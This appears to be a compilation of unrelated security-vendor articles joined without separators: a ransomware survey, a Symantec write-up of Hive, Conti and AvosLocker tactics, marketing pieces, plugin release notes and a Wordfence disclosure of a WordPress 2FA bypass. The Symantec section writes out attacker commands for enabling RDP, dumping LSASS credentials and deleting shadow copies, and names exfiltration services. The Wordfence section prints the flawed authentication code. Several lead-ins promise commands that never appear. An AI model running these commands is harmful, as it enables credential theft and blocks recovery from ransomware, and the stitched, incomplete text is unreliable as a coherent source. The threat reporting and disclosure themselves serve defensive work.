Today Sophos has released the State of Ransomware 2022, its annual study of the real-world ransomware experiences of IT professionals working at the frontline around the globe.
The study has revealed an ever more challenging attack environment together with the growing financial and operational burden ransomware places on its victims. It also shines new light on the relationship between ransomware and cyber insurance, and the role insurance is playing in driving changes to cyber defenses.
This year, 5,600 IT professional from 31 countries participated in the research, with 965 sharing details of ransom payments made. Key findings include:
Ransom attacks are more frequent – 66% of organizations surveyed were hit with ransomware in 2021, up from 37% in 2020
Ransom payments are higher – In 2021, 11% of organizations said they paid ransoms of $1 million or more, up from 4% in 2020, while the percentage of organizations paying less than $10,000 dropped to 21% from 34% in 2020. Overall, the average ransom paid by organizations that had data encrypted in their most significant ransomware attack, increased nearly fivefold to reach $812,360
More victims are paying the ransom – In 2021, 46% of organizations that had data encrypted in a ransomware attack paid the ransom. Twenty-six percent of organizations that were able to restore encrypted data using backups in 2021 also paid the ransom
The impact of a ransomware attack can be immense – The average cost to recover from the most recent ransomware attack in 2021 was $1.4 million. It took on average one month to recover from the damage and disruption. 90% of organizations said the attack had impacted their ability to operate, and 86% of private sector victims said they had lost business and/or revenue because of the attack
Many organizations rely on cyber insurance to help them recover from a ransomware attack – 83% of mid-sized organizations had cyber insurance that covers them in the event of a ransomware attack
Cyber insurance almost always pays out – In 98% of incidents where the victim had cyber insurance that covered ransomware, the insurer paid some or all the costs incurred (with 40% overall covering the ransom payment)
94% of those with cyber insurance said that their experience of getting it has changed over the last 12 months, with higher demands for cybersecurity measures, more complex or expensive policies and fewer organizations offering insurance protection
“The findings suggest we may have reached a peak in the evolutionary journey of ransomware, where attackers’ greed for ever higher ransom payments is colliding head on with a hardening of the cyber insurance market as insurers increasingly seek to reduce their ransomware risk and exposure,” said Chester Wisniewski, principal research scientist at Sophos.
“In recent years, it has become increasingly easy for cybercriminals to deploy ransomware, with almost everything available as-a-service. Second, many cyber insurance providers have covered a wide range of ransomware recovery costs, including the ransom, likely contributing to ever higher ransom demands. However, the results indicate that cyber insurance is getting tougher and in the future ransomware victims may become less willing or less able to pay sky high ransoms. Sadly, this is unlikely to reduce the overall risk of a ransomware attack. Ransomware attacks are not as resource intensive as some other, more hand-crafted cyberattacks, so any return is a return worth grabbing and cybercriminals will continue to go after the low hanging fruit.”
Sophos commissioned research agency Vanson Bourne to conduct an independent, vendor-agnostic survey of 5,600 IT professionals in mid-sized organizations (100-5,000 employees) across 31 countries. The survey was conducted during January and February 2022, and respondents were asked to respond based on their experiences over the previous year. Respondents were from Australia, Austria, Belgium, Brazil, Canada, chile, Colombia, Czech Republic, France, Germany, Hungary, India, Israel, Italy, Japan, Malaysia, Mexico, Netherlands, Nigeria, Philippines, Poland, Saudi Arabia, Singapore, South Africa, Spain, Sweden, Switzerland, Turkey, UAE, UK, and US.
Latest tools, tactics, and procedures being used by the Hive, Conti, and AvosLocker ransomware operations.
Targeted ransomware attacks continue to be one of the most critical cyber risks facing organizations of all sizes. The tactics used by ransomware attackers are continually evolving, but by identifying the most frequently employed tools, tactics, and procedures (TTPs) organizations can gain a deeper understanding into how ransomware groups infiltrate networks and use this knowledge to identify and prioritize areas of weakness.
Symantec, a division of Broadcom Software, tracks various ransomware threats; however, the following three ransomware families are being observed in the majority of recent attacks:
Hive
Conti
Avoslocker
Similar to many other ransomware families, Hive, Conti, and Avoslocker follow the ransomware-as-a-service (RaaS) business model. In the RaaS model the ransomware operators hire affiliates who are responsible for launching the ransomware attacks on their behalf. In most cases affiliates stick to a playbook that contains detailed attack steps laid out by the ransomware operators.
Once initial access to a victim network has been gained, Hive, Conti, and Avoslocker use a plethora of TTPs to help the operators achieve the following:
Gain persistence on the network
Escalate privileges
Tamper with and evade security software
Laterally move across the network
Initial Access
Affiliates for the Hive, Conti, and Avoslocker ransomware operators use a variety of techniques to gain an initial foothold on victim networks. Some of these techniques include:
Spear phishing leading to the deployment of malware, including but not limited to:
IcedID
Emotet
QakBot
TrickBot
Taking advantage of weak RDP credentials
Exploiting vulnerabilities such as:
Microsoft Exchange vulnerabilities – CVE-2021-34473, CVE-2021-34523, CVE-2021-31207, CVE-2021-26855
FortiGate firewall vulnerabilities – CVE-2018-13379 and CVE-2018-13374
Apache Log4j vulnerabily – CVE-2021-44228
In most cases, the spear-phishing emails contain Microsoft Word document attachments embedded with macros that lead to the installation of one of the previously mentioned malware threats. In some instances, attackers use this malware to install Cobalt Strike, which is then used to pivot to other systems on the network. These malware threats are then used to distribute ransomware onto compromised computers.
Persistence
After gaining initial access, Symantec has observed affiliates for all three ransomware families using third-party software such as AnyDesk and ConnectWise Control (previously known as ScreenConnect) to maintain access to victim networks. They also enable default Remote Desktop access in the firewall:
netsh advfirewall firewall set rule group=”Remote Desktop” new enable=yes
Actors are also known to create additional users on compromised systems to maintain access. In some instances we have seen threat actors add registry entries that allow them to automatically log in when a machine is restarted:
During the discovery phase the ransomware actors try to sweep the victim’s network to identify potential targets. Symantec has observed the aforementioned ransomware actors using tools such as the following:
ADRecon – Gathers Active Directory information and generates a report
Netscan – Discovers devices on the network
Credential Access
Mimikatz is a go-to tool for most ransomware groups and Hive, Conti, and Avoslocker are no exception. We have observed them using the PowerShell version of Mimikatz as well as the PE version of the tool. There are also instances where the threat actors directly load the PowerShell version of Mimikatz from GitHub repositories:
In addition to using Mimikatz, the threat actors have also taken advantage of the native rundll32 and comsvcs.dll combination to dump the LSASS memory:
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <process id> lsass.dmp full
Adversaries also dump the SECURITY, SYSTEM, and SAM hives and later extract credentials from the dump. In rare occasions they have also been observed using taskmgr.exe to dump the LSASS memory and later using the dump to extract valuable credentials.
Lateral Movement
Attackers employ tools like PsExec, WMI, and BITSAdmin to laterally spread and execute the ransomware on victim networks. We have also observed the attackers using several other techniques to laterally move across networks.
As with a number of other ransomware families, Hive, Conti, and Avoslocker also tamper with various security products that interfere with their goal. We have observed them meddling with security services using the net, taskkill, and sccommands to disable or terminate them. In some cases they also use tools like PC Hunterto end processes. They have also been seen tampering with various registry entries related to security products, since changes to the registry entries can make those products inoperative.
Both Hive and AvosLocker have been observed attempting to disable Windows Defender using the following reg.exe commands.
Adversaries tend to disable or tamper with operating system settings in order to make it difficult for administrators to recover data. Deleting shadow copies is a common tactic threat actors perform before starting the encryption process. They perform this task by using tools like Vssadmin or WMIC and running one of the following commands:
vssadmin.exe delete shadows /all /quiet
wmic.exe shadowcopy delete
We have also seen BCDEditbeing used to disable automatic system recovery and to ignore failures on boot:
Attackers commonly exfiltrate critical data from a victim’s environment before encrypting it. They then use the stolen data in an attempt to extort a ransom from victims. We have observed threat actors using the following cloud services to exfiltrate data:
https://anonfiles.com
https://mega.nz
https://send.exploit.in
https://ufile.io
https://www.sendspace.com
We have also seen attackers use the following tools for data exfiltration:
Filezilla
Rclone
Conclusion
The TTPs outlined in this blog are a snapshot of the current ransomware threat landscape. The TTPs used by these threat actors are constantly evolving, with groups continually tweaking their methods in a bid to outmaneuver their targets’ security defenses. As such, organizations need to be vigilant and employ a multi-layered security approach.
Symantec Protection
Symantec Endpoint Protection (SEP) protects against ransomware attacks using multiple static and dynamic technologies.
AV Protection
Ransom.Hive
Ransom.Conti
Ransom.AvosLocker
Backdoor.Cobalt
Hacktool.Mimikatz
Trojan.IcedID*
Trojan.Emotet*
W32.Qakbot*
Trojan.Trickybot*
Behavioral Protection
SONAR.RansomHive!g2
SONAR.RansomHive!g3
SONAR.RansomHive!g4
SONAR.RansomAvos!g2
SONAR.RansomConti!g1
SONAR.RansomConti!g3
SONAR.RansomConti!g4
SONAR.Ransomware!g30
SONAR.RansomGregor!g1
SONAR.SuspLaunch!gen4
SONAR.SuspLaunch!g18
SONAR.Ransom!gen59
SONAR.Ransomware!g26
SONAR.Cryptlck!g171
Intrusion Prevention System (IPS) detections
IPS blocks initial access, persistence, and lateral movement. SEP’s Audit Signatures are intended to raise awareness of potentially unwanted traffic on the network. By default, Audit Signatures do not block. Administrators reviewing the logs of IPS events in their network can note these Audit events and decide whether or not to configure the corresponding Audit Signatures to block the traffic.
The following is a list of Audit Signatures that can be enabled to block, through policies, activity related to the use of software or tools such as AnyDesk, ScreenConnect, and PsExec.
Symantec recommends that you have intrusion prevention enabled on all your devices including servers.
Adaptive Protection
Symantec Adaptive Protection can help protect against lateral movement and ransomware execution techniques used by an attacker. If you are not using tools like PsExec, WMIC, and BITSAdmin in your environment then you should “Deny” these applications and actions using Symantec Adaptive Protection policies.
Recommendations
Customers are advised to enable their Intrusion Prevention System (IPS) on desktops and servers for best protection. Click here for instructions on enabling the IPS Server Performance Tuning feature. This feature should be enabled on servers to allow additional tuning for the IPS module and definitions in high-throughput scenarios.
Customers are also advised to enable Proactive Threat Protection, also known as SONAR, which is Symantec’s behavior-based protection.
Customers should also keep Symantec Endpoint Protection (SEP) up-to-date with the latest version and definition set.
Symantec has multi-layer protection technologies for all the threat types. To provide the best protection, all SEP features should be enabled for Windows desktops and servers.
A company can accumulate massive amounts of information that security analysts are not able to monitor instantly. This can mean that priority security alerts either go unnoticed or are considered a false alarm because the appropriate technology is not available, which results in organizations failing to take action in time.
A Security Information and Event Management (SIEM) system specializes in prioritizing critical alerts over information received in real time, thus adapting to the needs of all organizations. This is achieved by incorporating multiple intelligence feeds and logs according to the criteria and needs set by the IT department. This makes it possible to categorize events and contextualize cybersecurity threat alerts.
The main benefits of having corporate SIEM systems are as follows:
A SIEM system ensures that alerts reach the right people so that they can carry out contextualized research and apply remediation mechanisms. This saves time as analysts are not required to interpret data from so many different sources.
It reduces the company’s costs, both in terms of infrastructure – by gaining full visibility into how the systems accessing the network are using it – and in terms of consuming resources. For example, a SIEM system can analyze the bandwidth machines are using and generate an event warning if one of them is consuming more resources than it should, which the IT department then checks for anomalies. SIEM enables better management of security resources, which translates into cost savings.
It restores cybersecurity configurations if they have been changed by mistake, which could leave an organization dangerously exposed to threats. SIEM can automatically detect a change in the configuration and generate an event to alert the company’s security analyst, who reviews the change and can restore the previous configuration if the new one is potentially hazardous to the company.
It detects operational maintenance activities in the business infrastructure that could pose a risk to the organization. Cybersecurity administrators incorporate the function of creating an event before a change to the company’s maintenance activities log, as well as in Windows. Then if there is any malicious activity they can decide whether or not to validate these adjustments.
It provides cyberattack control and protection in order to act before it becomes an irreversible problem, filtering whether it is a real attack or a false alarm. Known or unknown attacks are analyzed whether they are malwareless attacks (which resort to the legitimate tools of the system itself) or DDoS attacks or advanced persistent threats (APTs).
In the case of malware attacks, the usual security logs can send alerts for both real attacks and false alarms. To avoid alert saturation, SIEM solutions use event correlation to determine accurately whether or not it is a malware attack, as well as to detect the potential access points for the attack.
In DDoS attacks, SIEM is able to flag such an event from web traffic logs, prioritizing the event and sending it to an analyst for investigation before causing a slowdown or a total company service outage.
Finally, due to their complexity, when advanced persistent threats are detected they may not trigger alerts or be considered false alarms. Having a SIEM solution helps demonstrate a pattern of anomalous behavior, flagging it as a real concern for security analysts to investigate.
Given the differentiating value of this solution, WatchGuard has incorporated its SIEMFeeder module into WatchGuard EDR and EDPR to collect and correlate the status of IT systems, enabling organizations to turn large volumes of data into useful information for decision making.
You’ve been asked for a Vulnerability Assessment Report for your organisation and for some of you reading this article, your first thought is likely to be “What is that?”
Worry not. This article will answer that very question as well as why you need a Vulnerability Assessment Report and where you can get one from.
As it’s likely the request for such a report came from an important source such as the Board, a partner, a client or an auditor, there isn’t a moment to waste. So let’s drive straight in.
What is a Vulnerability Assessment Report and why do you need one?
A Vulnerability Assessment Report is simply a document that illustrates how you are managing your organisation’s vulnerabilities. It’s important because, with tens of thousands of new technology flaws being discovered every year, you need to be able to prove that your organisation does its best to avoid attack if you want to be trusted by partners and customers.
A best security practice recommended by governments across the world, a vulnerability assessment is an automated review process that provides insights into your current security state. The vulnerability assessment report is the outcome of this review. Used as a roadmap to a better state of security preparedness, it lays out the unique risks your organisation is up against due to the technology you use, and reveals how best to overcome them with minimal disruption to your core business strategy and operations.
The help it provides is clear but why do you need one? As mentioned above, it’s likely you were asked for a Vulnerability Assessment Report by the Board, a partner, a client or an auditor as each of these groups needs reassurance that you’re on top of any weaknesses in your infrastructure. Here’s why:
— Customers need to trust you
Weaknesses in your IT systems could affect your customers’ operations. With supply chain attacks on the rise, a vulnerability in a single company could leave the whole range of organizations paralysed, as demonstrated by the infamous SolarWinds hack last year.
It doesn’t matter how small your business is; if your customers will be entrusting you with any of their data, they may wish for a Vulnerability Assessment Report first to confirm that your IT security practices are tiptop.
— The Board wants a better understanding of the business’ risk
Cyber security is a growing concern across many businesses, so chances are your board members want to take a better grip of their risk, before the lack of insights into vulnerabilities is turned into a much more serious business problem. With ransomware attacks regularly making headlines, having proper vulnerability management in place and presenting an “all clear” report, can give your business heads that needed peace of mind.
— Your auditors are checking for compliance
Many of the regulatory or compliance frameworks related to security and privacy, like SOC2, HIPAA, GDPR, ISO 27001, and PCI DSS, advise or outright require regular compliance scans and reporting, so if the request for a vulnerability assessment report was made by your auditor, it is likely to be for compliance purposes.
— Your CFO is renewing your cyber insurance
It could be the case that your insurance provider is seeking a vulnerability assessment report as part of the underwriting process. If you don’t want to run the risk of being denied your insurance payment or wouldn’t like to see your premiums rise, then you could benefit from supplying these reports regularly.
How often do you need to produce a vulnerability assessment report?
Regularly. Think of it like vulnerability scanning: For maximum efficacy, you need to conduct regular, if not constant, comprehensive evaluations of your entire technology stack, otherwise you could miss something that could bring your business to a costly halt.
Cybercriminals do not stop searching until they find something they can take advantage of. You need to scan your systems continuously and have up to date reporting to reflect your vigilance as and when it’s needed.
Modern vulnerability scanning solutions, like Intruder, will give you a cyber hygiene score which enables you to track the progress of your vulnerability management efforts over time, proving that your security issues are being continuously resolved in good time.
A vulnerability assessment report from Intruder, to provide evidence to your customers or regulators that a vulnerability scanning process is in place.
What should be included in a vulnerability assessment report?
Unfortunately, there isn’t a one size fits all report. While the contents are generally the number of vulnerabilities detected in your systems at a point in time, your different stakeholders will require varying levels of detail. Even for compliance purposes, vulnerability assessment reporting requirements can differ.
As a good rule of thumb, we recommend building an Executive Report containing graph views and composite cyber hygiene scores for the Board and C-Suite that clue them in on where they stand at any given moment. And for your IT team, their report needs greater detail such as how to apply the correct solutions to existing problems and sidestep subsequent mistakes.
Where can you get a Vulnerability Assessment Report from?
Ensuring your Vulnerability Assessment Reports contain all the elements and information your stakeholders require can take a lot of work and expertise; which can distract your security teams from other activities that will keep your organisation secure. That is why it’s recommended to choose an external provider to produce your reports.
Before you start comparing individual vendors, make sure you have a solid understanding of your technical environment and of the specific outcomes that the vulnerability assessment should present. This is because vulnerability assessment tools are not built the same; they check for different types of weaknesses, so you need to choose the solution that best suits your requirements. Consider the features and checks you’ll require, as well as the industry standards you need to follow and your budget.
Two key elements to consider relate to reporting: firstly, how flexible the assessment provider will be with how much detail is presented (particularly if you need to present data to different audiences); and secondly, how clearly the results are communicated. Scanning results can be overwhelming but the right vendor will demystify complex security data to grant you a clear, jargon-free understanding of the risks you face.
At Intruder, reports are designed to be well-understood, whilst also maintaining all the technical detail required by IT managers and DevOps teams. Whether you’re a massive enterprise or a fledgling startup, you can generate rapid reports, create compliance paper trails, stay secure, and communicate with employees and potential investors. Intruder offers a free trial of its software, which you can activate here. Get vulnerability assessment reporting in place now.
Looking for the best way to extend your firewall protection to the cloud? Independent testing recently found that SonicWall NSv series is more than up to the challenge.
More than 90% of enterprises use the cloud in some way, with 69% of those considered hybrid cloud users (utilizing both private and public clouds). Along with widespread remote work adoption, this shift is driving the need for scaled-out, distributed infrastructure.
Within this new cloud landscape, security has become more complex as the number of perimeters and integrations grow, and cybercriminals increasingly focus on security gaps and vulnerabilities in cloud implementations. It’s often easier for threat actors to exploit these vulnerabilities than it is to breach hardened components of the cloud deployment.
A next-generation firewall deployed in the cloud can protect critical data stored in the cloud. But it’s important to make sure this firewall provides the same level of security and performance as an on-premises firewall.
Recently, Tolly Group used Keysight Technologies’ brand-new native cloud testing solution — CyPerf — to measure the performance of SonicWall NSv 470 virtual firewall in Amazon Web Services (AWS). AWS is the major public cloud vendor, with a projected 49% market share in enterprise cloud adoption for 2022. AWS recommends a shared responsibility model, meaning AWS is responsible for the security of the cloud, and the customer is responsible for security in the cloud.
What is SonicWall NSv virtual firewall?
SonicWall’s NSv Series virtual firewalls provide all the security advantages of a physical firewall, plus all the operational and economic benefits of the cloud — including system scalability and agility, speed of system provisioning, simple management and cost reduction. NSv delivers full-featured security tools including VPN, IPS, application control and URL filtering. These capabilities shield all critical components of the private/public cloud environments from resource misuse attacks, cross-virtual-machine attacks, side-channel attacks, and common network-based exploits and threats.
What is Keysight Technologies CyPerf?
Keysight CyPerf is the industry’s first cloud-native software solution that recreates every aspect of a realistic workload across a variety of physical and cloud environments. CyPerf deployed across a variety of heterogeneous cloud environments realistically models dynamic application traffic, user behavior and threat vectors at scale. It validates hybrid cloud networks, security devices and services for more confident rollouts.
Putting SonicWall NSv to the Test
Keysight Technologies and Tolly Group engineers tested a SonicWall NSv 470 virtual firewall running SonicOSX version 7. The AWS instance for the NSv 470 under test was AWS C5.2xlarge. The engineers deployed CyPerf agents on AWS C5.n2xlarge instances to be certain that the agents would have sufficient resources to stress the firewall under test. Each of two agent instances was provisioned with 8 vCPUs, 21GB memory and 25GbE network interfaces.
Test methodology and results
The engineers used three different traffic profiles to collect results — unencrypted HTTP traffic, encrypted (HTTPS/TLS) traffic, and Tolly’s productivity traffic mix, which includes five applications: JIRA, Office 365, Skype, AWS S3 and Salesforce. Engineers used CyPerf application mix tests to create the Tolly productivity mix and generate stateful, simulated application traffic.
The tests were run against three different security profiles:
1) Firewall: Basic firewall functions with no policy set
2) IPS: Firewall with the intrusion prevention system feature enabled
3) Threat Prevention: Firewall with IPS, antivirus, anti-spyware and application control features enabled
The results observed in the AWS public cloud environment are similar to the results observed in virtual environment.
Test
Unencrypted HTTP Traffic
Encrypted HTTPS/TLS Traffic
Firewall Throughput
7.70 Gbps
3.10 Gbps
IPS Throughput
7.60 Gbps
3.05 Gbps
Threat Prevention
7.40 Gbps
3.04 Gbps
Table 1: Test measurements for NSv 470 in AWS Cloud
Note: The table above highlights just a few of the test results. For complete results and test parameters, please download the report.
Conclusion
Most enterprises are moving their datacenters away from traditional on-premises deployments and to the cloud. It is imperative that security teams provide the same level of security for cloud server instances as they have been doing for on-premises physical servers. A next-generation firewall with advanced security services like IPS and application control is the first step to securing cloud instances against cyber threats.
In addition to security features, it also important to choose a firewall that provides the right level of performance needed for a given cloud workload. SonicWall NSv series offers a variety of models with performance levels suited to any size of cloud deployment, with all the necessary security features enabled. To learn more about how SonicWall NSv Series excels in AWS environments, click here.
Our lastest ShieldPRO 14.1 security plugin for WordPress brings a huge WordPress REST API integration along with some much-needed tweaks and enhancements.
Read on to discover everything we’ve included in your newest and favourite WordPress Securty Plugin.
Consider the work that’s involved with managing just 1 WordPress site and all its plugins, themes, updates, backups and, of course, security.
Now multiply that by the number of WordPress sites you run.
It’s a huge amount of work.
This is why we built iControlWP many years back and why we also integrated Shield Security into it to allow WordPress admins to manage their WordPress sites at scale, and also their WordPress security.
But not everyone wants to use iControlWP and that’s totally cool! But we still want to open up management of Shield to folk that need to scale their WordPress security.
This is where our new WordPress REST API integration comes in. It leverages the very thorough platform that the WordPress Core provides, letting us build a REST API that is powerful, secure and easy to maintain.
Many clients won’t have a need for our REST API directly, but you may use tools and services that could take advantage of if you asked them to.
This involved a major revamp of the UI and the tables that display the logs.
As you can imagine, these tables and data set can grow very large, particularly for busy websites.
Since we were loading a large dataset all at once, browsing these log tables became tedious and slow. For high traffic sites, it would unusable in some cases resulting in loading errors!
So we went back to our core implementation (again) and made the entire thing dynamic. Instead of loading all the records, we only load precisely what we need. This makes the initial loading near-instant.
The pagination will be a bit slower than what you’re used to – but this is because we’re loading just the log records you need, when you need them.
We’ve also adjusted the traffic log database table structure to help us speed all this along and provide more useful information right where you need it.
This is a major reworking and we hope you’ll love it!
#3 Run Shield As A “Must-Use” (MU) Plugin
If you’ve never heard of a must-use WordPress plugin, don’t worry, you’re not alone.
They’re installed in a different directory (/wp-content/mu-plugins/) instead of the default (/wp-content/plugins/).
So why would you want to switch Shield to be an MU plugin?
In much the same way as Shield offers the Security Admin module to protect against tampering, you could set Shield to be an MU plugin to prevent the plugin from being disabled accidentally, maliciously.
It’ll also ensure Shield executes before other plugins. While this won’t offer an advantage currently, we’ll soon adjust some Shield’s code to block malicious requests much earlier in the WordPress load.
What actually happens when you enable MU Mode?
The core of the Shield plugin will remain in the normal installation directory- /wp-content/plugins/.
Shield will then create a new file in the MU directory that loads the normal Shield plugin. When this happens you’ll see 2x Shield plugins installed on your site as shown below:
How can you disable Shield after enabling MU Mode?
Once MU mode is enabled, you can’t disable the normal Shield plugin from the WordPress dashboard. This is normal WordPress behviour.
However, you can simple revert the option within Shield’s settings to disable MU Mode, and then return the plugins screen and disable Shield like any other plugin.
The setting for MU Mode is found within the Security Admin module and doesn’t require a Security Admin PIN to be set.
Shield’s MU Mode plugin option
#4 Better Detection Of Incorrect Application Passwords
Until now Shield wasn’t correctly spotting when these application password login attempts were failing. We’ve added some new events and logging and we’ll even increase the offense counter for an IP address when the event is triggered.
We spotted these new events being triggered almost immediately after we put them live for testing.
#5 More Quick Access Data In Admin Bar
Some time ago we add a top menu to the WordPress admin bar to help indicate when Shield found some scan items that warrant further investigation.
The original WP Admin Bar addition by Shield Security
After prompting for some extra information by a client, we’ve made some new helpful additions to the menu (see image below).
Shield’s Additional WP Admin Bar Items
Each of these additions provide helpful links to the item in question, for example:
Recently Blocked IPs and Offenses link to the IP Analyse Tool for the specific IP in-question.
Recent Sessions links to the Shield Sessions table and the individual session item in the menu links to the profile of the given user.
On March 10, 2022 the Wordfence Threat Intelligence team initiated the responsible disclosure process for a vulnerability we discovered in “SiteGround Security”, a WordPress plugin that is installed on over 400,000 sites. This flaw makes it possible for attackers to gain administrative user access on vulnerable sites when two-factor authentication (2FA) is enabled but not yet configured for an administrator.
Wordfence Premium, Wordfence Care, and Wordfence Response received a set of firewall rules on March 10, 2022 to provide protection against any attackers trying to exploit this vulnerability. Wordfence Free users will receive this same protection 30 days later on April 9, 2022
After sending the full disclosure details to the SiteGround security team on March 10, 2022 a patch was released the next day on March 11, 2022. While the plugin was partially patched immediately, it wasn’t optimally patched until April 7, 2022.
Sites hosted on the SiteGround platform have automatically been updated to the patched version while those hosted elsewhere will require a manual update, if auto-updates are not enabled for the plugin. We strongly recommend ensuring that your site has been updated to the latest patched version of “SiteGround Security”, which is version 1.2.6 at the time of this publication.
SiteGround Security is a plugin designed to enhance the security of WordPress installations via several features like login security including 2FA, general WordPress hardening, activity monitoring, and more. It’s also worth noting that it comes pre-installed on all SiteGround hosted WordPress sites. Unfortunately, the 2FA functionality of the plugin was insecurely implemented making it possible for unauthenticated attackers to gain access to privileged accounts.
When two-factor authentication is enabled, it requires all administrative and editor users to set-up two factor authentication. This requirement is triggered when the site’s administrative and editor users log into the site for the first time after 2FA has been enabled at which time they are prompted to configure 2FA for their account. This means that there will be a period of time between 2FA being enabled on a site and each user configuring it for the account.
During this interim period, attackers could hijack the 2FA set-up process. The plugin had a flaw that made it so that attackers could completely bypass the first step of authentication, which requires a username and password, and access the 2FA set-up page for users that had not configured 2FA yet.
It was as simple as supplying the user ID they would like to compromise via the sg-user-id parameter, along with a few other parameters to indicate that they would like to trigger the initial 2FA configuration process.
The following validate_2fa_login() function shows the process by which a user-supplied ID is validated. If the results from the check_authentication_code() function and the sg_security_2fa_configured user meta retuned false, which indicated that 2FA hasn’t yet been configured for that user, then the plugin would load the 2fa-initial-setup-form.php template which displays the QR code and 2FA secret needed to configure the authenticator app for the user supplied ID.
</pre><pre>publicfunctionvalidate_2fa_login( $user) {// Bail if there is no valid user authentication.if( ! isset( $_POST['sg-user-id'] ) ) { // phpcs:ignorereturn;}$result= $this->check_authentication_code( wp_unslash( $_POST['sgc2facode'] ), wp_unslash( $_POST['sg-user-id'] ) ); // phpcs:ignore// Check the result of the authtication.if( false === $result) {if( 0 == get_user_meta( $_POST['sg-user-id'], 'sg_security_2fa_configured', true ) ) { // phpcs:ignore// Arguments for initial 2fa setup.$args= array('template'=> '2fa-initial-setup-form.php','qr'=> get_user_meta( $_POST['sg-user-id'], 'sg_security_2fa_qr', true ), // phpcs:ignore'secret'=> get_user_meta( $_POST['sg-user-id'], 'sg_security_2fa_secret', true ), // phpcs:ignore'error'=> esc_html__( 'Invalid verification code!', 'sg-security'),'action'=> esc_url( add_query_arg( 'action', 'sgs2fa', wp_login_url() ) ),);} else{// Arguments for 2fa login.$args= array('template'=> '2fa-login.php','error'=> esc_html__( 'Invalid verification code!', 'sg-security'),'action'=> esc_url( add_query_arg( 'action', 'sgs2fa', wp_login_url() ) ),);}$this->load_form( wp_unslash( $_POST['sg-user-id'] ), $args); // phpcs:ignore}// Set the auth cookie.wp_set_auth_cookie( wp_unslash( $_POST['sg-user-id'] ), intval( wp_unslash( $_POST['rememberme'] ) ) ); // phpcs:ignore</pre><pre>
The authentication QR code and secret key displayed that would be displayed to potentially unauthorized users.
The returned QR code and secret key are the only things needed to connect the user account with an authentication mechanism, such as Google Authenticator. Attackers were able to use this to connect their authentication app with the account and successfully use a code to pass the “second factor of authentication.” This function would then set the user authentication cookies via the wp_set_auth_cookie() function using the user supplied ID from the sg-user-id parameter which effectively logs the attacker in as that user. Due to the default configuration of the plugin, this account would most likely be a privileged user like an administrator or editor. It’s also worth noting that the function returns the back-up codes which could be used via the weakness outlined in the next section.
To sum it up, there was no validation on the validate_2fa_login() function that the identity a user was claiming was in fact legitimate. As such attackers could bypass the first authentication mechanism, a username/password pair, which is meant to prove identity and successfully log in, due to a weakness in the second authentication mechanism, the 2FA process. When successful, an attacker could completely infect a site by exploiting this vulnerability.
In addition to the above outlined vulnerability, the method in which 2FA back-up code authentication was handled made it possible for attackers to log in if they were able to brute force a back-up code for a user or compromise it via other means such as SQL Injection.
Diving deeper, the plugin registered the validate_2fabc_login() function which validated the supplied backup code through the validate_backup_login() function using the user supplied user ID from the sg-user-id parameter along with the back-up code supplied via the sgc2fabackupcode parameter. If the back-up code was found in the array of stored back-up codes for that user, then the function would use the wp_set_auth_cookie() function to set the authentication cookies for the supplied user ID. If that user ID belonged to an administrator, the attacker would effectively be logged in as an administrator.
</pre><pre>publicfunctionvalidate_2fabc_login() {$result= $this->validate_backup_login( wp_unslash( $_POST['sgc2fabackupcode'] ), wp_unslash( $_POST['sg-user-id'] ) ); // phpcs:ignore// Check the result of the authtication.if( false === $result) {$this->load_form(wp_unslash( $_POST['sg-user-id'] ), // phpcs:ignorearray('template'=> '2fa-login-backup-code.php','action'=> esc_url( add_query_arg( 'action', 'sgs2fabc', wp_login_url() ) ),'error'=> esc_html__( 'Invalid backup code!', 'sg-security'),));}// Set the auth cookie.wp_set_auth_cookie( wp_unslash( $_POST['sg-user-id'] ), intval( wp_unslash( $_POST['rememberme'] ) ) ); // phpcs:ignore
Similarly to the previous vulnerability, the issue here is that there was no true identity validation for the authentication, which indicates an authorization weakness. The function performed no checks to verify that a user had previously authenticated prior to entering the 2FA back-up code, and as such they did not need to legitimately log in prior to being logged in while using a back-up code. This meant that there were no checks to validate that a user was authorized to use a back-up code to perform the second factor of authentication that would log them in.
Though the risk in this case is lower, the backup codes were 8 digits long and entirely numeric, so an attacker could potentially brute force one of the 8 back-up codes and automatically be logged in without knowing a username and password combination for an administrative user.
While this might not be practical to attempt on most servers, a patient adversary attacking a well-provisioned server capable of processing a large number of requests at once would have a high chance of eventually gaining access unless the brute force attempts were stopped by another mechanism, such as the Wordfence plugin’s built-in brute force protection or rate limiting rules.
Further, this vulnerability could be used in conjunction with another vulnerability, such as SQL injection, where an attacker would be able to compromise the 2FA back-up codes that are stored in the database and then subsequently use them to log in without needing to crack the password of an administrative user which would likely be significantly stronger. In both cases, the impact would be significant as an attacker could gain administrative access to the compromised WordPress site which could be used for complete site infection.
An Important Security Reminder: Audit Your WordPress Site’s User Accounts
This vulnerability serves as an important reminder to audit your WordPress site’s user accounts. This means identifying any old and unused user accounts that have been inactive for an extended period of time and/or are likely to never be used again and removing them or completely stripping the user’s capabilities. This vulnerability could easily be exploited on sites where the site owner enabled 2FA, which is required for all administrative and editor users, and had old inactive administrative/editor user accounts on the site that an attacker could target. Considering accounts that are no longer active are unlikely to log in after the 2FA setting has been enabled, the 2FA for those accounts would not be configured leaving the site ripe for exploitation by any attackers exploiting the vulnerability.
A situation involving a similar security issue involving insecure 2FA was reported by the CISA in conjunction with the FBI a few weeks ago, around the same time we discovered this vulnerability. In the Cybersecurity Advisory (CSA) by the CISA, it was disclosed that a threat actor was able to successfully brute force a dormant user’s account credentials, and due to a default 2FA setting that would allow dormant users to re-enroll a new device for 2FA during the next active log in, the threat actor was able to connect the 2FA secret to their own account and retrieve the code needed to pass the second factor of authentication. Once the threat actor gained initial access to the system they were able to escalate their privileges by exploiting the “PrintNightmare” vulnerability, which you can read more about here, and steal sensitive information from across the organization’s network. This goes to show that attackers are definitely looking for flaws like the one disclosed today to exploit and any site can be a target. As such, it’s important to actively maintain and validate the security of your site through regularly performed professional or self-conducted security audits and penetration tests, which is a service Wordfence provides. Security is an active and continuous process.
Timeline
